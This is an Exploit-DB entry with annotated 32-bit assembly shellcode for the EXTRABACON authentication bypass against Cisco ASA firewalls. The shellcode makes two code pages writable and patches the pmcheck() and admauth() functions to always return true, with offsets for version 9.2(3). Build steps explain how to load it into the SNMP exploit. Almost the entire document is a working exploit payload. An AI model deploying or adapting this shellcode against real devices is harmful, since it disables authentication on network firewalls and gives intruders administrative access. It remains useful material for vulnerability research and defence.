Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)

EDB-ID:

40387

CVE:

N/A




Platform:

Hardware

Date:

2016-09-16


;
; Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes)
;
; Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
; License: http://opensource.org/licenses/MIT
; Release Date: September 15, 2016
;
; Author: Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
;
; Description:
;            This is not the same shellcode as the Equation Group version,
;            but accomplishes the same task of disabling the auth functions
;            in fewer stages/bytes. Particularly, it is 69 bytes in one stage
;            instead of 200+ bytes spread across 2 stages.
;
; Build/Run:
;            1) $ nasm shelldisable.nasm
;            2) copy resulting shellcode into preamble_byte/preamble_snmp vars
;            3) Change launcher_snmp to 6 nops (or remove entirely)
;
; Note: The offsets given are for 9.2(3), not part of the original release
;
BITS 32

; All five addresses are image-specific (per the header note they are for
; 9.2(3) only); the *_BOUNDS values are the page-aligned start of the page
; holding the matching *_OFFSET function entry, used as the mprotect() base.
SAFERET_OFFSET  equ     0x9277386       ; where to continue execution
PMCHECK_BOUNDS  equ     0x9b78000       ; mprotect for pmcheck()
PMCHECK_OFFSET  equ     0x9b78010       ; location of pmcheck()
ADMAUTH_BOUNDS  equ     0x8085000       ; page align for admauth()
ADMAUTH_OFFSET  equ     0x8085a40       ; location of admauth()

; we must patch pmcheck() and admauth() to always return true
; xor eax, eax  = 31 c0
; inc eax       = 40
; ret           = c3
; Stored as a little-endian dword, the constant below lands in memory as the
; byte sequence 31 c0 40 c3 -- a 4-byte stub that returns 1 unconditionally.

PATCH_CODE	equ	0xc340c031               ; gotta love endianness

; we need to fix the function frame to continue normal operation
; eax = 0x0
; esi = 0x0
; edi = 0x0b
; ebx = 0x10
; ebp = [esp - 0x4 (ret)] + 0x??
; These "expected register state" values are what the code at SAFERET_OFFSET
; appears to rely on; only FIX_EBP is known to vary between versions.
FIX_EBP         equ     0x48            ; this is 0x58, etc. in some versions
FIX_EDI         equ     0x0f0f0f0b      ; seems static?
FIX_EBX         equ     0x10            ; seems static?

_start:

    ; these are registers we have to clean up, so we can null them before save
    ; (pusha below snapshots these zeros, so the later popa restores eax, ebx,
    ; esi and ecx as 0 rather than as whatever they held at entry)
    xor eax, eax
    xor ebx, ebx
    xor esi, esi
    xor ecx, ecx                        ; ecx is volatile register

    pusha                               ; save all registers

    ; Build the sys_mprotect arguments one byte at a time (short encodings,
    ; no NUL bytes). ecx and eax were zeroed above; edx was NOT, so the
    ; "add dl, 0x7" only produces edx = 0x7 if dl is already 0 at entry --
    ; an unchecked assumption about the register state at the hijack point.
    add ch, 0x10                        ; ecx = 0x1000 (len: one page)
    add dl, 0x7                         ; edx = 0x7    (PROT_READ|PROT_WRITE|PROT_EXEC)
    add al, 0x7d                        ; eax = 0x7d   (i386 __NR_mprotect = 125)

    push eax                            ; save eax for second call (int 0x80 returns in eax)

    mov ebx, PMCHECK_BOUNDS             ; ebx = byte boundary for mprotect

    int 0x80                            ; sys_mprotect(PMCHECK_BOUNDS, 0x1000, 0x7)

    pop eax                             ; eax = 0x7d
    mov ebx, ADMAUTH_BOUNDS             ; second function page align

    int 0x80                            ; sys_mprotect(ADMAUTH_BOUNDS, 0x1000, 0x7)

    ; Neither syscall's return value is checked: if a mprotect() call fails,
    ; the corresponding store below writes to a still read-only code page and
    ; faults. After both calls the two code pages are writable AND executable
    ; (W^X no longer holds for them), which is the lasting side effect of this
    ; code beyond the 4-byte patches themselves.
    push PATCH_CODE
    pop eax                             ; eax = 0xc340c031 (push/pop avoids a 5-byte mov imm32)

    mov dword [PMCHECK_OFFSET], eax     ; write patch code to both functions
    mov dword [ADMAUTH_OFFSET], eax     ; (absolute, non-PIC stores; 4 bytes each)

    popa                                ; restore all registers

    push SAFERET_OFFSET                 ; push the safe return address

    ; these registers are pre-xored
    ; (ebx is 0 here because it was zeroed before pusha, so bl += 0x10 gives
    ; ebx = 0x10 exactly; eax and esi are 0 for the same reason)
    add bl, FIX_EBX
    mov edi, FIX_EDI

    ; esp now points at the pushed return address, so this matches the
    ; "ebp = [esp - 0x4 (ret)] + 0x??" frame description above: FIX_EBP is
    ; relative to the slot holding the return address, not to esp after ret.
    mov ebp, esp
    add ebp, FIX_EBP

    ret                                 ; return to safe address